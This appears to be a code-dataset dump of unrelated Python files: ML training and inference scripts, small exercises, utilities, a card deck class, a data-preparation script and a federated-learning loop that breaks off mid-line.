import models\nfrom configs import DatasetEnum, get_class_count\nfrom models.wide_resnet_28_10 import wide_resnet\n\n\ndef load_check_point(path, model, optimizer):\n    global start_epoch\n    checkpoint = torch.load(path)\n    model.load_state_dict(checkpoint['net'])\n    optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n\n    start_epoch = checkpoint['epoch']+1\n    model.eval()\n    return model, optimizer, start_epoch\n\ndef init(dataset, lr, use_cuda=True):\n    normalize_layer = models.NormalizationLayer(dataset)\n    num_classes = get_class_count(dataset)\n\n    if dataset == DatasetEnum.MNIST:\n        model = models.MNISTModel(num_classes)\n        optimizer = optim.Adam(model.parameters(), lr=lr)\n    elif dataset == DatasetEnum.SVHN:\n        lr = 0.002\n        model = models.ResNet18(num_classes)\n        optimizer = optim.Adam(model.parameters(), lr=lr)\n    elif dataset == DatasetEnum.CIFAR10:\n        lr = 0.02\n        model = wide_resnet(num_classes)\n        optimizer = optim.SGD(model.parameters(), lr, momentum=0.9, weight_decay=5e-4)\n\n    if use_cuda:\n        model = torch.nn.DataParallel(model).cuda()\n    model = torch.nn.Sequential(normalize_layer, model)\n    return model, optimizer\n\ndef only_test(dataset, batch_size):\n    trans = transforms.Compose([transforms.ToTensor()])\n    if dataset == DatasetEnum.MNIST:\n        test_loader = torch.utils.data.DataLoader(datasets.MNIST('./data', train=False, transform=trans),\n                                                  batch_size=batch_size, shuffle=False)\n    elif dataset == DatasetEnum.CIFAR10:\n        test_loader = torch.utils.data.DataLoader(datasets.CIFAR10('./data/CIFAR10', train=False, transform=trans),\n                                                  batch_size=batch_size, shuffle=False)\n    elif dataset == DatasetEnum.SVHN:\n        test_loader = torch.utils.data.DataLoader(\n            datasets.SVHN('./data/SVHN', split='test', transform=trans, download=True),\n            batch_size=batch_size, shuffle=False)\n    return test_loader","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} {"seq_id":"106338045","text":"# Exercise: define an Enemy class (name, attack power 10 -- 50, hit points 100 -- 200).\n# Create an enemy object whose data can be modified and read.\n# Encapsulate the attributes with @property\n\nclass Enemy:\n    def __init__(self, name, hp, atk):\n        self.name = name\n        self.atk = atk\n        self.hp = hp\n\n    @property\n    def atk(self):\n        return self.__atk\n\n    @atk.setter\n    def atk(self, value):\n        if 10 <= value <= 50:\n            self.__atk = value\n        else:\n            raise ValueError(\"I won't accept that\")\n\n    @property\n    def hp(self):\n        return self.__hp\n\n    @hp.setter\n    def hp(self, value):\n        if 100 <= value <= 200:\n            self.__hp = value\n        else:\n            raise ValueError(\"I won't accept that\")\n\n\ne01 = Enemy(\"灭霸\", 100, 25)\ne01.hp = 150\ne01.atk = 30\nprint(e01.hp)\nprint(e01.__dict__)\n","sub_path":"python_one_learn/day11/exercise03.py","file_name":"exercise03.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} {"seq_id":"192650719","text":"from keras import models\r\nfrom keras.models import model_from_json\r\nfrom keras.preprocessing.image import load_img,img_to_array,array_to_img\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport os\r\n\r\n# load the model\r\nmodel = model_from_json(open('model/chara_predict.json').read())\r\n\r\n# load the weights\r\nmodel.load_weights(\"weight/chara_predict.hdf5\")\r\n#model.summary()\r\n\r\n# compile the model\r\nfrom keras import optimizers\r\n\r\nmodel.compile(loss = \"binary_crossentropy\",\r\n              optimizer=optimizers.RMSprop(lr=1e-3),\r\n              metrics=[\"acc\"])\r\n\r\n\r\ncategories = 
[\"舞菜\",\"紗由\",\"かえ\",\"香澄\",\"瑞葉\",\"みい\",\r\n\"紫\",\"陽花\",\r\n\"碧音\",\"瑠夏\",\"珊瑚\",\r\n\"天葉\",\"奏\",\"那岐咲\",\r\n\"美久龍\",\"朱莉\",\"玄刃\",\"ハク\"]\r\n\r\n#認識したい画像の読み込み\r\nimg_name = os.listdir(\"検証データ\")\r\n\r\nfor j in range(len(img_name)):\r\n #img = load_img(\"検証データ/\"+str(j)+\".jpg\",target_size=(80,80,3))\r\n img = load_img(\"検証データ/\"+img_name[j],target_size=(80,80,3))\r\n x = img_to_array(img)/255\r\n x = np.expand_dims(x, axis=0)\r\n#予測\r\n features = model.predict(x)\r\n temp = np.zeros(18)\r\n for i in range(0,18):\r\n temp[i] = features[0,i]\r\n sortfea = sorted(temp, reverse=True)\r\n#予測の結果から処理を分ける\r\n for i in range(0,18):\r\n if features[0,i]== sortfea[0]:\r\n cat = categories[i]\r\n print(img_name[j]+\"は「\"+categories[i]+\"]と認識されました(認識率[%]=\", end='')\r\n print(np.array(sortfea[0]*100,dtype=int))\r\n \r\n for i in range(0,18):\r\n if features[0,i]== sortfea[1]:\r\n cat = categories[i]\r\n print(\"もし違うのであれば「\"+categories[i]+\"]ですか?(認識率[%]=\", end='')\r\n print(np.array(sortfea[1]*100,dtype=int))\r\n\r\n for i in range(0,18):\r\n if features[0,i]== sortfea[2]:\r\n cat = categories[i]\r\n print(\"それでも違うのであれば「\"+categories[i]+\"]ですか?(認識率[%]=\", end='')\r\n print(np.array(sortfea[2]*100,dtype=int))\r\n\r\n print(\" \")\r\n\r\n ","sub_path":"recognition.py","file_name":"recognition.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"503005720","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 9 09:05:25 2016\n\n@author: lmcfadden\n\"\"\"\n\nvow = 'aeiou'\ns = 'azcbobobegghakl'\ncnt = 0\n\nfor i in range(len(s)):\n if s[i] in vow:\n cnt += 1\n \nprint (cnt)","sub_path":"Python_2016/PS1_1.py","file_name":"PS1_1.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"10242091","text":"# -*- coding: utf-8 -*-\n# -*- author: jokker -*-\n\n\"\"\"\n常用到的一些零碎,未能整理的内容整理\n\"\"\"\n\nimport heapq\nfrom collections import OrderedDict\nfrom collections import Counter\nfrom operator import itemgetter\nfrom itertools import groupby\nimport random\nfrom itertools import dropwhile\nfrom itertools import islice\nfrom itertools import permutations\nfrom itertools import chain\n\n\nclass AssistUtil(object):\n\n def __init__(self):\n self.date = 123\n\n @staticmethod\n def find_nlargest_nsmallest(find_num, data, func=None, find_nlargest=True):\n \"\"\"找到最大或者最好的几个元素\"\"\"\n if find_nlargest:\n return heapq.nlargest(find_num, data, key=func)\n else:\n return heapq.nsmallest(find_num, data, key=func)\n\n # use_example\n # a = {'a': 12, 'b': 24, 'c': 3}\n # b = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\n # print AssistUtil.find_nlargest_nsmallest(2, a.values(), None)\n # print AssistUtil.find_nlargest_nsmallest(2, b, lambda x: x[1], False)\n\n @staticmethod\n def get_order_dict():\n \"\"\"获得有序字典\"\"\"\n # TODO 书上说可以在生成xml的时候让字段变得有序,可以试一下\n return OrderedDict()\n\n @staticmethod\n def most_common(data, need_num=None):\n \"\"\"找出序列中出现次数最多的元素,输入 list,返回值,第一个是元素值,第二个是元素个数\"\"\"\n counter = Counter(data)\n if need_num is None:\n return counter.most_common()\n else:\n return counter.most_common(need_num)\n\n # # use example\n # c = [1, 2, 3, 3, 2, 4, 5, 5, 6, 6, 332, 2, 22, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3]\n # print AssistUtil.most_common(c, 2)\n\n @staticmethod\n def sort_list_dict(assign_dict, assign_key):\n \"\"\"使用公共键对字典列表进行排序\"\"\"\n return sorted(assign_dict, key=itemgetter(assign_key))\n\n # # use example\n # 
d = [{'a': 1}, {'a': 12}, {'a': 34}, {'a': 2}]\n    # print AssistUtil.sort_list_dict(d, 'a')\n\n    @staticmethod\n    def group_by(assign_data, assign_key):\n        \"\"\"Group a list of dicts by a shared key.\"\"\"\n        assign_data.sort(key=itemgetter(assign_key))\n        return groupby(assign_data, key=itemgetter(assign_key))\n\n    # # use example\n    # e = [\n    #     {'a':'1', 'b':1323},\n    #     {'a':'2', 'b':1243},\n    #     {'a':'1', 'b':123},\n    #     {'a':'2', 'b':125343},\n    #     {'a':'3', 'b':1236},\n    #     {'a':'2', 'b':1223},\n    #     {'a':'3', 'b':12354},\n    # ]\n    # for a, each in AssistUtil.group_by(e, 'a'):\n    #     print a\n    #     for i in each:\n    #         print\n\n    # ------------------------ other ---------------------------------\n    @staticmethod\n    def reversed(data):\n        \"\"\"Reverse; useful for iterating a sequence back to front.\"\"\"\n        return reversed(data)\n\n    # iterate over permutations\n    @staticmethod\n    def permutations(data, assign_num=None):\n        \"\"\"Permutations; the number of elements drawn at a time can be specified.\"\"\"\n        for p in permutations(data, assign_num):\n            print(p)\n\n\n# skip the leading elements of an iterable\n# (a name distinct from itertools.dropwhile, so the call inside resolves to the library function)\ndef skip_leading_comments():\n    \"\"\"Skip the designated leading lines.\"\"\"\n    with open(r'', 'r') as f:\n        for line in dropwhile(lambda x: x.startswith('#'), f):\n            print(line)\n\n\n# when the number of elements to skip is known\n# (a name distinct from itertools.islice, for the same reason)\ndef skip_known_count():\n    \"\"\"Skip a known number of leading elements.\"\"\"\n    items = [1, 2, 3, 4, 5, 6, 7]\n    # print every element except the first three\n    for x in islice(items, 3, None):\n        print(x)\n\n\n# iterate over several sequences\n# (a name distinct from itertools.chain; the parameter was unused and is dropped)\ndef iterate_chained():\n    \"\"\"Iterate over several sequences by linking them together with chain.\"\"\"\n    for i in chain([1, 2, 3], {4, 5, 6}, (7, 8, 9)):\n        print(i)\n\n\nif __name__ == '__main__':\n\n    a = {'a': 12, 'b': 24, 'c': 3}\n\n    b = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\n\n    c = [1, 2, 3, 3, 2, 4, 5, 5, 6, 6, 332, 2, 22, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3]\n\n    # c = ['1','2','3','4','1']\n\n    d = [{'a': 1}, {'a': 12}, {'a': 34}, {'a': 2}]\n\n    e = [\n        {'a': '1', 'b': 1323},\n        {'a': '2', 'b': 1243},\n        {'a': '1', 'b': 123},\n        {'a': '2', 'b': 125343},\n        {'a': '3', 'b': 1236},\n        {'a': '2', 'b': 1223},\n        {'a': '3', 'b': 12354},\n    ]\n\n    print(AssistUtil.find_nlargest_nsmallest(2, a.values(), None))\n    print(AssistUtil.find_nlargest_nsmallest(2, b, lambda x: x[1], False))\n\n    print(AssistUtil.most_common(c, 2))\n\n    for a, each in AssistUtil.group_by(e, 'a'):\n        print(a)\n        for i in each:\n            print(i)\n","sub_path":"Assist/AssistUtil.py","file_name":"AssistUtil.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} {"seq_id":"462453484","text":"import json\nimport boto3\nimport datetime\n\n### Step in the testing framework's step function to update end timestamp and\n### move the testing to the next test.\n\nsession = boto3.Session(region_name = 'us-west-2')\ns3 = session.resource(\"s3\")\nddb = session.client(\"dynamodb\")\n\nCONFIG_TABLE = 'datalake-test-config'\n\ndef lambda_handler(event, context):\n    \n    testid = event.get('test_id')\n    print(\"testid:\" + str(testid))\n    if None == testid:\n        testid = '0'\n    else:\n        first_item = ddb.scan( TableName=CONFIG_TABLE,\n                    ScanFilter = {\n                     'test_id' : {'AttributeValueList':[{'S':testid}],\n                    'ComparisonOperator':'EQ'}\n                    }\n                )\n    \n        if None == first_item or 0 >= len(first_item.get('Items')):\n            print(\"No test found\")\n        else:\n            # fetch the matching item before reading its attributes\n            item = first_item.get('Items')[0]\n            is_active = item.get('active').get('N')\n            ## Update endedAt only if test was active\n            if( \"1\" == str(is_active)):\n                item['endedAt'] = {'S':str(datetime.datetime.now())}\n                ddb.put_item(TableName=CONFIG_TABLE, Item=item)\n\n    ## Increment to next test.\n    testid = str(int(testid) + 1)\n    rt = {\"test_id\": testid}\n    \n    return 
rt\n","sub_path":"sdlf-utils/pipeline-testing/src/lambdas/nextTest.py","file_name":"nextTest.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"231940801","text":"# Create a Deck of Cards, Ben Cillie, 11/1/18\nimport random\n\nsuits = ['s','c','h','d']\nranks = [1,2,3,4,5,6,7,8,9,10,11,12,13]\nclass Card:\n\tdef __init__(self, suit, rank):\n\t\tself.suit = suit\n\t\tself.rank = rank\n\n\tdef __str__(self):\n\t\tif self.rank == 1:\n\t\t\trank = \"Ace\"\n\t\telif self.rank == 11:\n\t\t\trank = \"Jack\"\n\t\telif self.rank == 12:\n\t\t\trank = \"Queen\"\n\t\telif self.rank == 13:\n\t\t\trank = \"King\"\n\t\telse:\n\t\t\trank = self.rank\n\t\tif self.suit == 'h':\n\t\t\tsuit = \"Hearts\"\n\t\telif self.suit == 'd':\n\t\t\tsuit = \"Diamond\"\n\t\telif self.suit == 'c':\n\t\t\tsuit = \"Clubs\"\n\t\telif self.suit == 's':\n\t\t\tsuit = \"Spades\"\n\t\treturn str(rank) + \" of \" + str(suit)\n\n\nclass Deck:\n\t# default: Start with a complete, 52 card deck\n\tdef __init__(self, default):\n\t\tself.default = default\n\t\tself.cards = []\n\t\tif self.default:\n\t\t\tfor suit in suits:\n\t\t\t\tfor rank in ranks:\n\t\t\t\t\tself.cards.append(Card(suit,rank))\n\n\t# rearragne the deck randomly\n\tdef shuffle(self):\n\t\trandom.shuffle(self.cards)\n\n\t# sort the deck by: suit or rank\n\tdef sort(self, method):\n\t\tcardz = []\n\t\tif method == \"suit\":\n\t\t\tfor suit in suits:\n\t\t\t\tprint(\"Suit is \" + suit)\n\t\t\t\tfor c in self.cards:\n\t\t\t\t\tif c.suit == suit:\n\t\t\t\t\t\tcardz.append(c)\n\t\t\tself.cards = cardz\n\t\telif method == \"rank\":\n\t\t\tcardz = []\n\t\t\tcardz.append(self.cards[0])\n\t\t\tfor c in self.cards[1:]:\n\t\t\t\ti = 1\n\t\t\t\tput = False\n\t\t\t\tfor cz in cardz:\n\t\t\t\t\tif c.rank <= cz.rank:\n\t\t\t\t\t\tcardz.insert(i-1, c)\n\t\t\t\t\t\tput = True\n\t\t\t\t\t\tbreak\n\t\t\t\t\ti += 1\n\t\t\t\tif not put:\n\t\t\t\t\tcardz.append(c)\n\t\t\tself.cards = cardz\n\n\t# \n\tdef draw(deck, method, count):\n\t\tif method == 'rand':\n\t\t\tfor i in range(count):\n\t\t\t\tpass\n\t\telif method == 'top':\n\t\t\tfor i in range(count):\n\t\t\t\tpass\n\n\t# Remove a card from the deck\n\t# card: type(int or Card)\n\t# type Card removes first instance of that card\n\tdef remove(self, card):\n\t\tif isinstance(card, int):\n\t\t\tif card < len(self.cards):\n\t\t\t\tdel self.cards[card]\n\t\telif isinstance(card, Card):\n\t\t\tfor c in self.cards:\n\t\t\t\ti = 0\n\t\t\t\tif c.suit == card.suit and c.rank == card.rank:\n\t\t\t\t\tdel self.cards[i]\n\t\t\t\ti += 1\n\n\n\tdef add(self, card, position=0):\n\t\tif position > len(self.cards):\n\t\t\tposition = 0\n\t\tself.cards.insert(position, card)\n\n\tdef __str__(self):\n\t\tcardz = \"\"\n\t\ti = 0\n\t\tfor c in self.cards:\n\t\t\tcardz += (str(c) + \"\\n\")\n\t\t\ti += 1\n\t\tprint(str(i))\n\t\treturn cardz\n\n\nd = Deck(True)\nd.shuffle()\nd.sort(\"rank\")\nprint(str(d))","sub_path":"cards.py","file_name":"cards.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"77641446","text":"#\n# Copyright (C) 2011 - 2021 Satoru SATOH \n# SPDX-License-Identifier: MIT\n#\n# Suppress import positions after some global variables are defined\n# pylint: disable=wrong-import-position\n\"\"\"A collection of default backend modules.\n\"\"\"\nimport warnings\n\nfrom . 
import (\n ini,\n json,\n pickle,\n properties,\n shellvars,\n yaml,\n xml\n)\nfrom .base import (\n ParserT, ParsersT, ParserClssT\n)\n\n\nPARSERS: ParserClssT = [\n ini.Parser, pickle.Parser, properties.Parser, shellvars.Parser, xml.Parser\n] + json.PARSERS\n\n_NA_MSG = \"'{}' module is not available. Disabled {} support.\"\n\nif yaml.PARSERS:\n PARSERS.extend(yaml.PARSERS)\nelse:\n warnings.warn(_NA_MSG.format('yaml', 'YAML'), ImportWarning)\n\ntry:\n from . import toml\n PARSERS.append(toml.Parser)\nexcept ImportError:\n warnings.warn(_NA_MSG.format('toml', 'TOML'), ImportWarning)\n\n\n__all__ = [\n 'ParserT', 'ParsersT', 'ParserClssT',\n 'PARSERS',\n]\n\n# vim:sw=4:ts=4:et:\n","sub_path":"src/anyconfig/backend/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"124661381","text":"import glob\nimport json\n\n# modify the root to ModelNet40\nroot = \"./ModelNet40\"\n\nclses = []\n\n\ndef mk_model_net40():\n l = glob.glob(root+'/*')\n\n # save classes\n for x in l:\n clses.append(x.split('/')[-1])\n with open(\"./classes.txt\", 'w') as f:\n for i, x in enumerate(clses):\n f.write(str(i)+\":\\t\"+x+\"\\n\")\n\n # generate train single\n train_single_3d = []\n for i, path in enumerate(l):\n single_list = glob.glob(path+'/train/*')\n for single_path in single_list:\n train_single_3d.append([single_path, i])\n with open(\"train_single_3d.json\", 'w') as f:\n json.dump(train_single_3d, f)\n\n # generate test single\n test_single_3d = []\n for i, path in enumerate(l):\n single_list = glob.glob(path + '/test/*')\n for single_path in single_list:\n test_single_3d.append([single_path, i])\n with open(\"test_single_3d.json\", 'w') as f:\n json.dump(test_single_3d, f)\n\n # generate train multi\n # ./ModelNet40/xbox/train/xbox_0027.obj_whiteshaded_v0.png\n train_3d = []\n for i, path in enumerate(l):\n single_list = glob.glob(path + '/train/*')\n tmpl = []\n for single_path in single_list:\n tmpl.append(single_path.split(\"obj_whiteshaded\")[-2])\n tmpl = list(set(tmpl))\n tmpl = [[x, i] for x in tmpl]\n train_3d.extend(tmpl)\n with open(\"train_3d.json\", 'w') as f:\n json.dump(train_3d, f)\n\n # generate test multi\n # ./ModelNet40/xbox/train/xbox_0027.obj_whiteshaded_v0.png\n test_3d = []\n for i, path in enumerate(l):\n single_list = glob.glob(path + '/test/*')\n tmpl = []\n for single_path in single_list:\n tmpl.append(single_path.split(\"obj_whiteshaded\")[-2])\n tmpl = list(set(tmpl))\n tmpl = [[x, i] for x in tmpl]\n test_3d.extend(tmpl)\n with open(\"test_3d.json\", 'w') as f:\n json.dump(test_3d, f)\n\n\nif __name__ == '__main__':\n mk_model_net40()\n","sub_path":"data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"206887345","text":"import os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#Getting the 
files\nExternalFilesFolder=r\"C:\\Users\\Giulia\\Desktop\\Gitex\\python4ScientificComputing_Numpy_Pandas_MATPLotLIB\\ExternalFiles\"\nTemperatureFileName=\"Austin_weather_2014.csv\"\nIrradianceFileName=\"irradiance_2014_gen.csv\"\nConsumptionFileName=\"consumption_5545.csv\"\npath_ConsumptionFileName=os.path.join(ExternalFilesFolder,ConsumptionFileName)\npath_TemperatureFile=os.path.join(ExternalFilesFolder,TemperatureFileName)\npath_IrradianceFile=os.path.join(ExternalFilesFolder,IrradianceFileName)\n\n#Opening DataFrame of consumption and changing the index format\nDF_consumption=pd.read_csv(path_ConsumptionFileName,sep=\",\",index_col=0)\nPreviousIndex=DF_consumption.index\nNewParseIndex=pd.to_datetime(PreviousIndex)\nDF_consumption.index=NewParseIndex\nDF_consumption.index.dayofweek\n\n#Finding data for a specific period of time\nDF_consumption_somedaysinMay=DF_consumption[\"2014-05-15 00:00:00\":\"2014-05-30 23:00:00\"]\n\n#Finding weather data of the referred period\nDF_weather=pd.read_csv(path_TemperatureFile,sep=\";\",index_col=0)\npreviousIndex_weather=DF_weather.index\nNewIndex_weather=pd.to_datetime(previousIndex_weather)\nDF_weather.index=NewIndex_weather\n\n#a new data frame with a list as colomn\nDF_Temperature_somedaysinMay=DF_weather[[\"temperature\"]][\"2014-05-15 00:00:00\":\"2014-05-30 23:00:00\"]\n\n#temperature in Celsius\ndef celsius(row):\n FtoCelsius=(row-32)*5/9\n return FtoCelsius\nDF_Temperature_celsius=DF_Temperature_somedaysinMay.apply(celsius)\n\n#Reading the Irradiance file\nDF_IrradianceSource=pd.read_csv(path_IrradianceFile,sep=\";\",index_col=1)\nPreviousIndex=DF_IrradianceSource.index\nNewIndexIrradiance=pd.to_datetime(PreviousIndex)\nDF_IrradianceSource.index=NewIndexIrradiance\nDF_Irradiance_insomedaysinMay=DF_IrradianceSource[[\"gen\"]][\"2014-05-15 00:00:00\":\"2014-05-30 23:00:00\"]\n\nDF_Irradiance_insomedaysinMay[\"gen\"]<0\nDF_Irradiance_insomedaysinMay[\"gen\"][DF_Irradiance_insomedaysinMay[\"gen\"]<0]=0\n \n \n\nDF_joined=DF_consumption.join([DF_Temperature_celsius,DF_Irradiance_insomedaysinMay])\nDF_joined.head()\nDF_joined_cleaned=DF_joined.dropna()\nDF_joined_cleaned_insomedaysinMay=DF_joined_cleaned[\"2014-05-15 00:00:00\":\"2014-05-30 23:00:00\"]\n\nplt.subplot(3,1,1)\nplt.plot(DF_consumption_somedaysinMay)\nplt.xlabel(\"Time\")\nplt.ylabel(\"AC Power(W)\")\n\nplt.subplot(3,1,2)\nplt.plot(DF_Temperature_celsius)\nplt.xlabel(\"Time\")\nplt.ylabel(\"Temperature\")\n\nplt.subplot(3,1,3)\nplt.plot(DF_Irradiance_insomedaysinMay)\nplt.xlabel(\"data\")\nplt.ylabel(\"Generation-->Irradiance\")\n\n#changing the scale\ntemp_max=DF_joined_cleaned[\"temperature\"].min()\ntemp_min=DF_joined_cleaned[\"temperature\"].max()\nDF_joined_cleaned[\"Temperature Normalized\"]=(DF_joined_cleaned[\"temperature\"]-temp_min)/(temp_max-temp_min)\n\nDF_joined_cleaned.head(4)\n\nair_conditioner_5545_min=DF_joined_cleaned[\"air conditioner_5545\"].min()\nair_conditioner_5545_max=DF_joined_cleaned[\"air conditioner_5545\"].max()\nDF_joined_cleaned[\"air conditioner_5545 Normalized\"]=(DF_joined_cleaned[\"air conditioner_5545\"]-air_conditioner_5545_min)/(air_conditioner_5545_max-air_conditioner_5545_min)\n\ngen_min=DF_joined_cleaned[\"gen\"].min()\ngen_max=DF_joined_cleaned[\"gen\"].max()\nDF_joined_cleaned[\"gen Normalized\"]=(DF_joined_cleaned[\"gen\"]-gen_min)/(gen_max-gen_min)\n\n\nplt.figure()\nplt.plot(DF_joined_cleaned[\"Temperature Normalized\"])\nplt.plot(DF_joined_cleaned[\"air conditioner_5545 Normalized\"])\nplt.plot(DF_joined_cleaned[\"gen 
Normalized\"])\nplt.xlabel(\"Time\")\nplt.ylabel(\"Normalized Data\")","sub_path":"Assignment7_B/Assignment 8B_GiuliaSora/Assignment8partB.py","file_name":"Assignment8partB.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"581810170","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# Python version: 3.6\r\n\r\nimport matplotlib\r\nmatplotlib.use('Agg')\r\nimport matplotlib.pyplot as plt\r\nimport copy\r\nimport numpy as np\r\nfrom torchvision import datasets, transforms\r\nimport torch\r\nimport time\r\n\r\nfrom utils.sampling import mnist_iid, mnist_noniid, cifar_iid\r\nfrom utils.options import args_parser\r\nfrom models.Update import LocalUpdate\r\nfrom models.Nets import MLP, CNNMnist, CNNCifar\r\nfrom models.Fed import FedAvg\r\nfrom models.test import test_img\r\n\r\n\r\nif __name__ == '__main__':\r\n # parse args\r\n args = args_parser()\r\n args.device = torch.device('cuda:{}'.format(args.gpu) if torch.cuda.is_available() and args.gpu != -1 else 'cpu') #使用gpu或cpu\r\n\r\n # load dataset and split users\r\n if args.dataset == 'mnist': #图片格式为28*28*1\r\n #Compose函数把多个图像处理步骤放在一起\r\n trans_mnist = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]) #均值和方差\r\n dataset_train = datasets.FashionMNIST('../dataset/', train=True, download=True, transform=trans_mnist)\r\n dataset_test = datasets.FashionMNIST('../dataset/', train=False, download=True, transform=trans_mnist)\r\n # sample users\r\n if args.iid:\r\n #dict_users = mnist_iid(dataset_train, args.num_users) #把数据集分成100份,即每份600个\r\n dict_users=np.load(f'./save/dict_users_{args.num_users}.npy',allow_pickle=True).tolist()\r\n else:\r\n dict_users = mnist_noniid(dataset_train, args.num_users)\r\n elif args.dataset == 'cifar': #图片格式为32*32*3\r\n trans_cifar = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\r\n dataset_train = datasets.CIFAR10('../dataset/', train=True, download=True, transform=trans_cifar)\r\n dataset_test = datasets.CIFAR10('../dataset/', train=False, download=True, transform=trans_cifar)\r\n if args.iid:\r\n #dict_users = cifar_iid(dataset_train, args.num_users)\r\n dict_users=np.load(f'./save/cifar_dict_users_{args.num_users}.npy',allow_pickle=True).tolist()\r\n else:\r\n exit('Error: only consider IID setting in CIFAR10')\r\n else:\r\n exit('Error: unrecognized dataset')\r\n img_size = dataset_train[0][0].shape #结果为1*28*28\r\n\r\n # build model\r\n if args.model == 'cnn' and args.dataset == 'cifar':\r\n net_glob = CNNCifar(args=args).to(args.device)\r\n elif args.model == 'cnn' and args.dataset == 'mnist':\r\n net_glob = CNNMnist(args=args).to(args.device)\r\n elif args.model == 'mlp':\r\n len_in = 1\r\n for x in img_size:\r\n len_in *= x\r\n net_glob = MLP(dim_in=len_in, dim_hidden=200, dim_out=args.num_classes).to(args.device)\r\n else:\r\n exit('Error: unrecognized model')\r\n print(net_glob,'\\n') #打印神经网络信息,由nn.module类提供\r\n\r\n #torch.save(net_glob.state_dict(),'./save/cifar_weight.pth')\r\n\r\n # copy weights\r\n # net_glob.load_state_dict(torch.load('./save/cifar_weight.pth'))\r\n net_glob.load_state_dict(torch.load('./save/weight.pth'))\r\n net_glob.train() #启用 BatchNormalization和Dropout, 与eval函数相对\r\n w_glob = net_glob.state_dict() #暂存初始网络参数\r\n\r\n # training\r\n loss_train = [] #存放每进行一次FedAvg的损失\r\n round_accuracy=[]\r\n\r\n gama=1 #信道分配\r\n B=1 #信道增益\r\n S=100 #模型大小\r\n p=1 #传输功率\r\n N0=1 #噪声功率\r\n sigma=1/3 
#训练时间修正因子\r\n # h_sq= np.abs(np.random.exponential(1,args.num_users).tolist()) #信道增益的平方,服从指数分布\r\n # all_upload_time_list=[int(S/(gama*B*np.log2(1+p*i/gama*B*N0))) for i in h_sq] #上传时间\r\n computer_level=np.random.uniform(1,9,args.num_users).tolist() #计算能力\r\n communicate_time=[] #记录每轮通信时间 \r\n all_train_time_list=[int(sigma*args.local_ep*len(dict_users[i])/computer_level[i]) for i in range(args.num_users)]\r\n #upload_time_list = np.load('./save/upload_time.npy').tolist()\r\n #upload_time_list= np.abs(np.trunc(15*np.random.randn(args.num_users)+60).astype(int).tolist()) #随机设置上传时间\r\n acc_test=0\r\n iter=0\r\n acc=70\r\n # np.save('./save/upload_time.npy',upload_time_list)\r\n # time_start=time.time() #计时开始\r\n #for iter in range(args.epochs): #默认值已设为10,一个迭代进行一次FedAvg\r\n while acc_test<=acc:\r\n print('Round {:3d}'.format(iter+1))\r\n w_locals, loss_locals,w_idx= [], [], []#存放每个用户的本地模型参数和损失\r\n w_delta=[] #存放每个用户的||Δw||\r\n m = max(int(args.frac * args.num_users), 1) #结果为10\r\n h_sq= np.abs(np.random.exponential(1,args.num_users).tolist()) #信道增益的平方,服从指数分布\r\n all_upload_time_list=[int(S/(gama*B*np.log2(1+p*i/gama*B*N0))) for i in h_sq] #上传时间\r\n idxs_users = np.random.choice(range(args.num_users), m, replace=False) #在100个用户中随机选10个用户\r\n train_time=max([all_train_time_list[idx] for idx in idxs_users])\r\n for idx in idxs_users:\r\n #LocalUpdate函数为一个用户的训练网络函数\r\n local = LocalUpdate(args=args, dataset=dataset_train, idxs=dict_users[idx]) #idxs为一个用户的数据集,大小为600\r\n ww, loss = local.train(net=copy.deepcopy(net_glob).to(args.device))\r\n\r\n #求该用户二范数的变化量\r\n w=copy.deepcopy(ww) #某用户训练完后的权值\r\n delta_w=copy.deepcopy(w_glob) #初始化Δw向量\r\n for Weight in delta_w.keys():\r\n delta_w[Weight]=w[Weight]-w_glob[Weight] #该用户训练完后的权值和全局模型权值做差\r\n w_norm=0\r\n for w_name,w_par in delta_w.items(): \r\n w_norm=w_norm+(np.linalg.norm(w_par.cpu().numpy()))**2 #依次求二范数平方再求和\r\n #print(len(dict_users[idx]),',用户',idx,':',(w_norm)**0.5)\r\n #\r\n w_locals.append(w)\r\n loss_locals.append(copy.deepcopy(loss))\r\n w_delta.append(w_norm)\r\n # np.save('./save/w_delta.npy',w_delta)\r\n # update global weights\r\n #挑选二范数大的一半用户\r\n sorted_list=sorted(enumerate(w_delta),key=lambda x: x[1],reverse = True)\r\n w_idx=[idxs_users[i[0]] for i in sorted_list][0:int(m/2)]\r\n upload_time=sum([all_upload_time_list[i] for i in w_idx])\r\n w_locals=[w_locals[i[0]] for i in 